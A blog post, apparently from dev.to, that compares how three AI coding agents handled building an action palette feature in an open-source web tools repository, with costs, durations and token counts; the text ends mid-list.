&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltml19xef278wmy3f5y1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltml19xef278wmy3f5y1.png" alt="LLMDev models ranking"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, I grabbed these three and put them into the same existing project (over 8K stars and 50K+ LOC) and asked them to build a couple of real features like a normal dev would.&lt;/p&gt;

&lt;p&gt;Same repo. Same prompts. Same constraints.&lt;/p&gt;

&lt;p&gt;For each task, I took the best result out of three runs per model to keep things fair.&lt;/p&gt;

&lt;p&gt;Then I compared what they actually did: code quality, how much hand-holding they needed, and whether the feature even worked in the end.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; Don't take the result of this test as a hard rule. This is just a small set of real-world coding tasks that shows how each model did for me in that exact setup and gives you an overview of the difference in the top 3 models' performance in the same tasks.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you want a quick take, here’s how the three models performed in our tests:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.5&lt;/strong&gt; was the most consistent overall. It shipped working results for both tasks, and the UI polish was the best of the three. The main downside is cost. If they find a way to achieve this performance while reducing cost, it will actually be over for most other models.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.2-codex (high)&lt;/strong&gt; was one of the best. But it's obviously slower due to the higher reasoning. When it hit, the code quality and structure were great, but it needed more patience than the other two in this repo.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Gemini 3 Pro&lt;/strong&gt; was the most efficient. Both tasks worked, but the output often felt like the minimum viable version, especially on the analytics dashboard.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 If you want the safest pick for real “ship a feature in a big repo” work, Opus 4.5 felt the most reliable in my runs. If you care about speed and cost and you’re okay polishing UI yourself, Gemini 3 Pro is a solid bet.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Test Workflow
&lt;/h2&gt;

&lt;p&gt;For the test, we will use the following CLI coding agents:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; Claude Code (Anthropic’s terminal-based agentic coding tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gemini 3 Pro:&lt;/strong&gt; Gemini CLI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.2 High:&lt;/strong&gt; Codex CLI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here’s the repo used for the entire test: &lt;a href="https://github.com/iib0011/omni-tools" rel="noopener noreferrer"&gt;iib0011/omni-tools&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will check the models on two different tasks:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Task 1:&lt;/strong&gt; Add a global Action Palette (Ctrl + K)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each model is asked to create a global action menu that opens with a keyboard shortcut. This feature expands on the current search by adding actions, global state, and keyboard navigation. This task checks how well the model understands current UX patterns and avoids repetition without breaking what's already in place.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Task 2:&lt;/strong&gt; Tool Usage Analytics + Insights Dashboard&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each model had to add real usage tracking across the app, persist it locally, and then build an analytics dashboard that shows things like the most used tools, recent activity, and basic filters.&lt;/p&gt;

&lt;p&gt;We’ll compare code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; I will share the source code changes for each task by each model in a &lt;code&gt;.patch&lt;/code&gt; file. This way, you can easily view them on your local system by cloning the repository and applying the patch file using &lt;code&gt;git apply &amp;lt;path_file_name&amp;gt;&lt;/code&gt;. This method makes sharing changes easier.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Real-world Coding Tests
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Test 1: Add a global Action Palette (Ctrl + K)
&lt;/h3&gt;

&lt;p&gt;The task is simple: all models start from the same base commit and then follow the same prompt to build what is asked in the prompt.&lt;/p&gt;

&lt;p&gt;And obviously, as mentioned, I will evaluate the response from the model from the "Best of 3."&lt;/p&gt;

&lt;p&gt;Let's start off the test with something interesting:&lt;/p&gt;

&lt;p&gt;Here's the prompt used:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;project&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;already&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;has&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;search&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;input&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;page&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;lets&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;users&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;find&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;I&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;want&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;add&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;an&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;improved,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;global&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;idea&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;works&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;an&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;**Action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Palette**,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;similar&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;what&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;you&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;see&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;editors&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;like&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;VS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Code.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;**What&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;build**&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Pressing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;**Ctrl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;K**&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(or&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Cmd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;K&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;macOS)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;open&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;centered&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;palette&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;overlay&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;anywhere&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;app.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;palette&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;support:&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Searching&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigating&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(reuse&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;metadata)&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Executing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;actions,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;such&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as:&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Toggle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;dark&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;mode&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Switch&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;language&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Toggle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;user&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;filter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(General&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;/&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Developer)&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Navigate&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Bookmarks&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Clear&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;recently&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Fully&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;keyboard-driven&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;experience:&lt;/span&gt;&lt;span class="w"&gt;

  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;filter&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Arrow&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;keys&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigate&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Enter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;execute&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Escape&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;close&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;**Notes**&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;not&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;replace&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;page&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;search.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Think&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;it&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;more&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;powerful,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;global&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;combines&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;actions.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;implementation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;follow&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;patterns,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;styling,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;state&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;management&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;codebase.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  GPT-5.2-Codex (high)
&lt;/h4&gt;

&lt;p&gt;GPT-5.2 handled this surprisingly well. The implementation was solid end to end, and it basically one-shotted the entire feature set, including i18n support, without needing multiple correction passes.&lt;/p&gt;

&lt;p&gt;That said, it did take a bit longer than some other models (~20 minutes), which is expected since reasoning was explicitly set to &lt;strong&gt;high&lt;/strong&gt;. You can clearly see the model spending more time thinking through architecture, naming, and edge cases rather than rushing to output code. The trade-off felt worth it here.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9r0rf1kkm4x2nlqpmnyg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9r0rf1kkm4x2nlqpmnyg.png" alt="gpt 5.2 high model timing to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The token usage was noticeably higher due to the reasoning set to high, but the output code reflected that.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QCXB5bv4-L4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/6a8eea20c34d31429b254c82079a1972" rel="noopener noreferrer"&gt;GPT-5.2 High Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$0.9-1.0&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~20 minutes (API time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +540 lines, minimal removals&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total:&lt;/strong&gt; ~203k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~140k (+ cached context)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~64k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning tokens:&lt;/strong&gt; ~47k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; I ran the exact same prompt with the same model using the default (medium) reasoning level. The difference was honestly massive. With reasoning set to high, the quality of the code, structure, and pretty much everything jumps by miles. It’s not even a fair comparison.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhg35u0w8yip2r8myxqlf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhg35u0w8yip2r8myxqlf.png" alt="gpt 5.2 model token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Opus 4.5
&lt;/h4&gt;

&lt;p&gt;Claude went all in and prepared a ton of different strategies. At the start, it did run into build issues, but it kept running the build until it was able to fix all the build and lint issues.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feib2ks93r37revcoqg3e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feib2ks93r37revcoqg3e.png" alt="claude opus 4.5 build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The entire run took me about &lt;strong&gt;7 minutes 50 seconds&lt;/strong&gt;, which is the fastest among the models for this test. The features all worked as asked, and obviously, the UI looked super nice and exactly how I expected.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Gki_kO6o4Qw"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/5403f82ea5cf5991c14bc43ce3f47476" rel="noopener noreferrer"&gt;Claude Opus 4.5 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To be honest, this exceeded my expectations; even the i18n texts are added and displayed in the UI just as expected. Absolute cinema!&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; $0.94&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 7 min 50 sec (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +540 lines, -9 lines&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7junvt7jb8wulyvnwnce.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7junvt7jb8wulyvnwnce.png" alt="claude opus 4.5 token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Gemini 3 Pro
&lt;/h4&gt;

&lt;p&gt;Gemini 3 got it working, but it's clearly not on the same level as GPT-5.2 High or Claude Opus 4.5. The UI it built is fine and totally usable, but it feels a bit barebones, and you don't get many choices in the palette compared to the other two.&lt;/p&gt;

&lt;p&gt;One clear miss is that language switching does not show up inside the action palette at all, which makes the i18n support feel incomplete even though translations technically exist.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/2jxnkna5OmA"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/07d46534f0f3e2523ddc2f3e4c814795" rel="noopener noreferrer"&gt;Gemini 3 Pro Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Low (helped significantly by cache reads)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~10 minutes 49 seconds (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +428 lines, -65 lines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
